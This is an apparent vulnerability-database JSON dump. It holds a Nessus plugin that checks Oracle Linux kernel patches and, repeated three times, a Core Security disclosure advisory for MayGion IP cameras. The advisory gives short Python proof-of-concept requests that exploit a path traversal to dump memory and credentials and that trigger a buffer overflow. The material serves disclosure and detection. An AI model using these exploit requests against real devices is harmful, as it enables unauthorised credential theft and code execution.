This could allow a local, unprivileged user to cause a\ndenial of service by reading zero bytes from the image_type or\npacket_size files in '/sys/devices/platform/dell_rbu/'.\n(CVE-2009-0322, Moderate)\n\n* an inverted logic flaw was found in the SysKonnect FDDI PCI adapter\ndriver, allowing driver statistics to be reset only when the\nCAP_NET_ADMIN capability was absent (local, unprivileged users could\nreset driver statistics). (CVE-2009-0675, Moderate)\n\n* the sock_getsockopt() function in the Linux kernel did not properly\ninitialize a data structure that can be directly returned to\nuser-space when the getsockopt() function is called with SO_BSDCOMPAT\noptname set. This flaw could possibly lead to memory disclosure.\n(CVE-2009-0676, Moderate)\n\n* the ext2 and ext3 file system code failed to properly handle\ncorrupted data structures, leading to a possible local denial of\nservice when read or write operations were performed on a specially\ncrafted file system. (CVE-2008-3528, Low)\n\n* a deficiency was found in the libATA implementation. This could,\npotentially, lead to a local denial of service. Note: by default, the\n'/dev/sg*' devices are accessible only to the root user.\n(CVE-2008-5700, Low)\n\nBug fixes :\n\n* a bug in aic94xx may have caused kernel panics during boot on some\nsystems with certain SATA disks. (BZ#485909)\n\n* a word endianness problem in the qla2xx driver on PowerPC-based\nmachines may have corrupted flash-based devices. (BZ#485908)\n\n* a memory leak in pipe() may have caused a system deadlock. The\nworkaround in Section 1.5, Known Issues, of the Red Hat Enterprise\nLinux 5.3 Release Notes Updates, which involved manually allocating\nextra file descriptors to processes calling do_pipe, is no longer\nnecessary. (BZ#481576)\n\n* CPU soft-lockups in the network rate estimator. (BZ#481746)\n\n* bugs in the ixgbe driver caused it to function unreliably on some\nsystems with 16 or more CPU cores. 
(BZ#483210)\n\n* the iwl4965 driver may have caused a kernel panic. (BZ#483206)\n\n* a bug caused NFS attributes to not update for some long-lived NFS\nmounted file systems. (BZ#483201)\n\n* unmounting a GFS2 file system may have caused a panic. (BZ#485910)\n\n* a bug in ptrace() may have caused a panic when single stepping a\ntarget. (BZ#487394)\n\n* on some 64-bit systems, notsc was incorrectly set at boot, causing\nslow gettimeofday() calls. (BZ#488239)\n\n* do_machine_check() cleared all Machine Check Exception (MCE) status\nregisters, preventing the BIOS from using them to determine the cause\nof certain panics and errors. (BZ#490433)\n\n* scaling problems caused performance problems for LAPI applications.\n(BZ#489457)\n\n* a panic may have occurred on systems using certain Intel WiFi Link\n5000 products when booting with the RF Kill switch on. (BZ#489846)\n\n* the TSC is invariant with C/P/T states, and always runs at constant\nfrequency from now on. (BZ#489310)\n\nAll users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. 
The system must be\nrebooted for this update to take effect.", "edition": 27, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : kernel (ELSA-2009-0326)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5700", "CVE-2008-3528", "CVE-2009-0675", "CVE-2009-0028", "CVE-2009-0778", "CVE-2009-0322", "CVE-2009-0676", "CVE-2009-0269"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-PAE", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:kernel-xen-devel", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-PAE-devel", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-xen"], "id": "ORACLELINUX_ELSA-2009-0326.NASL", "href": "https://www.tenable.com/plugins/nessus/67812", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2009:0326 and \n# Oracle Linux Security Advisory ELSA-2009-0326 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67812);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-3528\", \"CVE-2008-5700\", \"CVE-2009-0028\", \"CVE-2009-0269\", \"CVE-2009-0322\", \"CVE-2009-0675\", \"CVE-2009-0676\", \"CVE-2009-0778\");\n script_bugtraq_id(33846);\n script_xref(name:\"RHSA\", value:\"2009:0326\");\n\n script_name(english:\"Oracle Linux 5 : kernel (ELSA-2009-0326)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", 
\n value:\n\"From Red Hat Security Advisory 2009:0326 :\n\nUpdated kernel packages that fix several security issues and several\nbugs are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes :\n\n* memory leaks were found on some error paths in the icmp_send()\nfunction in the Linux kernel. This could, potentially, cause the\nnetwork connectivity to cease. (CVE-2009-0778, Important)\n\n* Chris Evans reported a deficiency in the clone() system call when\ncalled with the CLONE_PARENT flag. This flaw permits the caller (the\nparent process) to indicate an arbitrary signal it wants to receive\nwhen its child process exits. This could lead to a denial of service\nof the parent process. (CVE-2009-0028, Moderate)\n\n* an off-by-one underflow flaw was found in the eCryptfs subsystem.\nThis could potentially cause a local denial of service when the\nreadlink() function returned an error. (CVE-2009-0269, Moderate)\n\n* a deficiency was found in the Remote BIOS Update (RBU) driver for\nDell systems. This could allow a local, unprivileged user to cause a\ndenial of service by reading zero bytes from the image_type or\npacket_size files in '/sys/devices/platform/dell_rbu/'.\n(CVE-2009-0322, Moderate)\n\n* an inverted logic flaw was found in the SysKonnect FDDI PCI adapter\ndriver, allowing driver statistics to be reset only when the\nCAP_NET_ADMIN capability was absent (local, unprivileged users could\nreset driver statistics). (CVE-2009-0675, Moderate)\n\n* the sock_getsockopt() function in the Linux kernel did not properly\ninitialize a data structure that can be directly returned to\nuser-space when the getsockopt() function is called with SO_BSDCOMPAT\noptname set. 
This flaw could possibly lead to memory disclosure.\n(CVE-2009-0676, Moderate)\n\n* the ext2 and ext3 file system code failed to properly handle\ncorrupted data structures, leading to a possible local denial of\nservice when read or write operations were performed on a specially\ncrafted file system. (CVE-2008-3528, Low)\n\n* a deficiency was found in the libATA implementation. This could,\npotentially, lead to a local denial of service. Note: by default, the\n'/dev/sg*' devices are accessible only to the root user.\n(CVE-2008-5700, Low)\n\nBug fixes :\n\n* a bug in aic94xx may have caused kernel panics during boot on some\nsystems with certain SATA disks. (BZ#485909)\n\n* a word endianness problem in the qla2xx driver on PowerPC-based\nmachines may have corrupted flash-based devices. (BZ#485908)\n\n* a memory leak in pipe() may have caused a system deadlock. The\nworkaround in Section 1.5, Known Issues, of the Red Hat Enterprise\nLinux 5.3 Release Notes Updates, which involved manually allocating\nextra file descriptors to processes calling do_pipe, is no longer\nnecessary. (BZ#481576)\n\n* CPU soft-lockups in the network rate estimator. (BZ#481746)\n\n* bugs in the ixgbe driver caused it to function unreliably on some\nsystems with 16 or more CPU cores. (BZ#483210)\n\n* the iwl4965 driver may have caused a kernel panic. (BZ#483206)\n\n* a bug caused NFS attributes to not update for some long-lived NFS\nmounted file systems. (BZ#483201)\n\n* unmounting a GFS2 file system may have caused a panic. (BZ#485910)\n\n* a bug in ptrace() may have caused a panic when single stepping a\ntarget. (BZ#487394)\n\n* on some 64-bit systems, notsc was incorrectly set at boot, causing\nslow gettimeofday() calls. (BZ#488239)\n\n* do_machine_check() cleared all Machine Check Exception (MCE) status\nregisters, preventing the BIOS from using them to determine the cause\nof certain panics and errors. 
(BZ#490433)\n\n* scaling problems caused performance problems for LAPI applications.\n(BZ#489457)\n\n* a panic may have occurred on systems using certain Intel WiFi Link\n5000 products when booting with the RF Kill switch on. (BZ#489846)\n\n* the TSC is invariant with C/P/T states, and always runs at constant\nfrequency from now on. (BZ#489310)\n\nAll users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-April/000944.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(189, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2008-3528\", \"CVE-2008-5700\", \"CVE-2009-0028\", \"CVE-2009-0269\", \"CVE-2009-0322\", \"CVE-2009-0675\", \"CVE-2009-0676\", \"CVE-2009-0778\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2009-0326\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-2.6.18-128.1.6.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-128.1.6.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-devel-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-128.1.6.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-2.6.18-128.1.6.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-devel-2.6.18\") && 
rpm_check(release:\"EL5\", reference:\"kernel-debug-devel-2.6.18-128.1.6.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-devel-2.6.18-128.1.6.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-doc-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-doc-2.6.18-128.1.6.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-headers-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-headers-2.6.18-128.1.6.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-2.6.18-128.1.6.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-devel-2.6.18-128.1.6.0.1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "cvelist": ["CVE-2013-1605", "CVE-2013-1604"], "description": "\r\n\r\nCore Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com/\r\n\r\nMayGion IP Cameras multiple vulnerabilities\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: MayGion IP Cameras multiple vulnerabilities\r\nAdvisory ID: CORE-2013-0322\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\r\nDate published: 2013-05-28\r\nDate of last update: 2013-05-28\r\nVendors contacted: MayGion\r\nRelease mode: Coordinated release\r\n\r\n2. 
*Vulnerability Information*\r\n\r\nClass: Path traversal [CWE-22], Buffer overflow [CWE-119]\r\nImpact: Code execution, Security bypass\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1604, CVE-2013-1605\r\n\r\n3. *Vulnerability Description*\r\n\r\nMultiple vulnerabilities have been found in MayGion IP cameras [1] based\r\non firmware v09.27 and below, that could allow an unauthenticated remote\r\nattacker:\r\n\r\n 1. [CVE-2013-1604] to dump the camera's memory and retrieve user\r\ncredentials,\r\n 2. [CVE-2013-1605] to execute arbitrary code.\r\n\r\n4. *Vulnerable Packages*\r\n\r\n . MayGion IP cameras based on firmware 2011.27.09.\r\n . Other firmware versions are probably affected too but they were not\r\nchecked.\r\n\r\n5. *Non-Vulnerable Packages*\r\n\r\n . H.264 ipcam firmware 2013.04.22.\r\n\r\n6. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Nahuel Riva and\r\nFrancisco Falcon from Core Exploit Writers Team.\r\n\r\n7. *Technical Description / Proof of Concept Code*\r\n\r\n7.1. *User Credentials Leaked via Path Traversal*\r\n\r\n[CVE-2013-1604] The following Python code exploits a path traversal and\r\ndumps the camera's memory. Valid user credentials can be extracted from\r\nthis memory dump by an unauthenticated remote attacker.\r\n\r\n/-----\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection("192.168.100.1")\r\nconn.request("GET", "/../../../../../../../../../proc/kcore")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n\r\n7.2. *Buffer overflow*\r\n\r\n[CVE-2013-1605] The following Python script can be used to trigger the\r\nvulnerability without authentication. 
As a result, the Instruction\r\nPointer register (IP) will be overwritten with 0x61616161, which is a\r\ntypical buffer overrun condition.\r\n\r\n/-----\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection("192.168.100.1")\r\nconn.request("GET", "/" + "A" * 3000 + ".html")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n\r\n8. *Report Timeline*\r\n\r\n. 2013-05-02:\r\nCore Security Technologies notifies MayGion of the vulnerabilities.\r\nPublication date is set for May 29th, 2013.\r\n\r\n. 2013-05-02:\r\nVendor asks for a report with technical information.\r\n\r\n. 2013-05-03:\r\nA draft advisory containing technical details sent to MayGion team.\r\n\r\n. 2013-05-03:\r\nVendor notifies that all vulnerabilities were fixed in the last firmware\r\nversion, released April 22nd, 2013.\r\n\r\n. 2013-05-09:\r\nCore asks for a list of affected devices and firmware. No reply received.\r\n\r\n. 2013-05-28:\r\nAdvisory CORE-2013-0322 is published.\r\n\r\n9. *References*\r\n\r\n[1] http://www.maygion.com\r\n\r\n10. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n11. 
*About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n12. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2013 Core Security\r\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n13. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n\r\n", "edition": 1, "modified": "2013-06-05T00:00:00", "published": "2013-06-05T00:00:00", "id": "SECURITYVULNS:DOC:29457", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29457", "title": "CORE-2013-0322 - MayGion IP Cameras multiple vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T02:13:52", "description": "MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities. CVE-2013-1604,CVE-2013-1605. 
Webapps exploit for hardware platform", "published": "2013-05-29T00:00:00", "type": "exploitdb", "title": "MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1605", "CVE-2013-1604"], "modified": "2013-05-29T00:00:00", "id": "EDB-ID:25813", "href": "https://www.exploit-db.com/exploits/25813/", "sourceData": "Core Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com/\r\n\r\nMayGion IP Cameras multiple vulnerabilities\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: MayGion IP Cameras multiple vulnerabilities\r\nAdvisory ID: CORE-2013-0322\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\r\nDate published: 2013-05-28\r\nDate of last update: 2013-05-28\r\nVendors contacted: MayGion\r\nRelease mode: Coordinated release\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Path traversal [CWE-22], Buffer overflow [CWE-119]\r\nImpact: Code execution, Security bypass\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1604, CVE-2013-1605\r\n\r\n3. *Vulnerability Description*\r\n\r\nMultiple vulnerabilities have been found in MayGion IP cameras [1] based\r\non firmware v09.27 and below, that could allow an unauthenticated remote\r\nattacker:\r\n\r\n 1. [CVE-2013-1604] to dump the camera's memory and retrieve user\r\ncredentials,\r\n 2. [CVE-2013-1605] to execute arbitrary code.\r\n\r\n4. *Vulnerable Packages*\r\n\r\n . MayGion IP cameras based on firmware 2011.27.09.\r\n . Other firmware versions are probably affected too but they were not\r\nchecked.\r\n\r\n5. *Non-Vulnerable Packages*\r\n\r\n . H.264 ipcam firmware 2013.04.22.\r\n\r\n6. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Nahuel Riva and\r\nFrancisco Falcon from Core Exploit Writers Team.\r\n\r\n7. *Technical Description / Proof of Concept Code*\r\n\r\n7.1. 
*User Credentials Leaked via Path Traversal*\r\n\r\n[CVE-2013-1604] The following Python code exploits a path traversal and\r\ndumps the camera's memory. Valid user credentials can be extracted from\r\nthis memory dump by an unauthenticated remote attacker.\r\n\r\n/-----\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/../../../../../../../../../proc/kcore\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n\r\n7.2. *Buffer overflow*\r\n\r\n[CVE-2013-1605] The following Python script can be used to trigger the\r\nvulnerability without authentication. As a result, the Instruction\r\nPointer register (IP) will be overwritten with 0x61616161, which is a\r\ntypical buffer overrun condition.\r\n\r\n/-----\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/\" + \"A\" * 3000 + \".html\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n\r\n8. *Report Timeline*\r\n\r\n. 2013-05-02:\r\nCore Security Technologies notifies MayGion of the vulnerabilities.\r\nPublication date is set for May 29th, 2013.\r\n\r\n. 2013-05-02:\r\nVendor asks for a report with technical information.\r\n\r\n. 2013-05-03:\r\nA draft advisory containing technical details sent to MayGion team.\r\n\r\n. 2013-05-03:\r\nVendor notifies that all vulnerabilities were fixed in the last firmware\r\nversion, released April 22nd, 2013.\r\n\r\n. 2013-05-09:\r\nCore asks for a list of affected devices and firmware. No reply received.\r\n\r\n. 2013-05-28:\r\nAdvisory CORE-2013-0322 is published.\r\n\r\n9. *References*\r\n\r\n[1] http://www.maygion.com\r\n\r\n10. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. 
We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n11. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n12. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2013 Core Security\r\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n13. 
*PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25813/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:30", "description": "\nMayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities", "edition": 1, "published": "2013-05-29T00:00:00", "title": "MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1605", "CVE-2013-1604"], "modified": "2013-05-29T00:00:00", "id": "EXPLOITPACK:8106854FC718881871F19270353E1090", "href": "", "sourceData": "Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nMayGion IP Cameras multiple vulnerabilities\n\n1. *Advisory Information*\n\nTitle: MayGion IP Cameras multiple vulnerabilities\nAdvisory ID: CORE-2013-0322\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\nDate published: 2013-05-28\nDate of last update: 2013-05-28\nVendors contacted: MayGion\nRelease mode: Coordinated release\n\n2. *Vulnerability Information*\n\nClass: Path traversal [CWE-22], Buffer overflow [CWE-119]\nImpact: Code execution, Security bypass\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2013-1604, CVE-2013-1605\n\n3. *Vulnerability Description*\n\nMultiple vulnerabilities have been found in MayGion IP cameras [1] based\non firmware v09.27 and below, that could allow an unauthenticated remote\nattacker:\n\n 1. [CVE-2013-1604] to dump the camera's memory and retrieve user\ncredentials,\n 2. [CVE-2013-1605] to execute arbitrary code.\n\n4. *Vulnerable Packages*\n\n . MayGion IP cameras based on firmware 2011.27.09.\n . 
Other firmware versions are probably affected too but they were not\nchecked.\n\n5. *Non-Vulnerable Packages*\n\n . H.264 ipcam firmware 2013.04.22.\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Nahuel Riva and\nFrancisco Falcon from Core Exploit Writers Team.\n\n7. *Technical Description / Proof of Concept Code*\n\n7.1. *User Credentials Leaked via Path Traversal*\n\n[CVE-2013-1604] The following Python code exploits a path traversal and\ndumps the camera's memory. Valid user credentials can be extracted from\nthis memory dump by an unauthenticated remote attacker.\n\n/-----\nimport httplib\n\nconn = httplib.HTTPConnection(\"192.168.100.1\")\nconn.request(\"GET\", \"/../../../../../../../../../proc/kcore\")\nresp = conn.getresponse()\ndata = resp.read()\nconn.close()\n-----/\n\n7.2. *Buffer overflow*\n\n[CVE-2013-1605] The following Python script can be used to trigger the\nvulnerability without authentication. As a result, the Instruction\nPointer register (IP) will be overwritten with 0x61616161, which is a\ntypical buffer overrun condition.\n\n/-----\nimport httplib\n\nconn = httplib.HTTPConnection(\"192.168.100.1\")\nconn.request(\"GET\", \"/\" + \"A\" * 3000 + \".html\")\nresp = conn.getresponse()\ndata = resp.read()\nconn.close()\n-----/\n\n8. *Report Timeline*\n\n. 2013-05-02:\nCore Security Technologies notifies MayGion of the vulnerabilities.\nPublication date is set for May 29th, 2013.\n\n. 2013-05-02:\nVendor asks for a report with technical information.\n\n. 2013-05-03:\nA draft advisory containing technical details sent to MayGion team.\n\n. 2013-05-03:\nVendor notifies that all vulnerabilities were fixed in the last firmware\nversion, released April 22nd, 2013.\n\n. 2013-05-09:\nCore asks for a list of affected devices and firmware. No reply received.\n\n. 2013-05-28:\nAdvisory CORE-2013-0322 is published.\n\n9. *References*\n\n[1] http://www.maygion.com\n\n10. 
